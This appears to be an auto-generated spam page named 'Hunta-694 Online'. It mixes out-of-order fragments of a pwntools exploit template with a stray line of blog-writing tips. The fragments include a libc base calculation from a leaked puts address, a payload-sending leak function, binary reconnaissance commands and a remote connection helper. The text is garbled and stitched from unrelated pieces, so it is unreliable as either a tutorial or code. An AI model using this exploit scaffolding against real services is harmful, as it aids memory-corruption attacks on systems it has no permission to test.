Hunta-694 Online

# ---- Step 2: Compute libc base ------------------------------------ libc = ELF('<path_to_libc.so.6>') # provided or from system libc.address = leaked_puts - libc.symbols['puts'] log.info(f'Libc base: hex(libc.address)')

With your purpose, audience, and title in mind, it's time to start writing. Here are some tips to keep your content engaging: hunta-694

$ file hunta-694 $ ldd hunta-694 # for binaries $ strings hunta-694 | head $ binwalk hunta-694 # for embedded data and title in mind

def leak_address(io, payload): io.sendlineafter(b'Input:', payload) io.recvuntil(b'Leaked: ') leak = io.recvline().strip() return u64(leak.ljust(8, b'\x00')) hunta-694

# ---------------------------------------------------------------------- # Helper functions # ---------------------------------------------------------------------- def start(): if HOST and PORT: return remote(HOST, PORT) else: return process(BINARY)

# ---------------------------------------------------------------------- # Configuration # ---------------------------------------------------------------------- HOST = '<remote_host>' # or None for local PORT = <remote_port> # or None for local BINARY = './hunta-694' # path to the binary (if local) ELF = ELF(BINARY)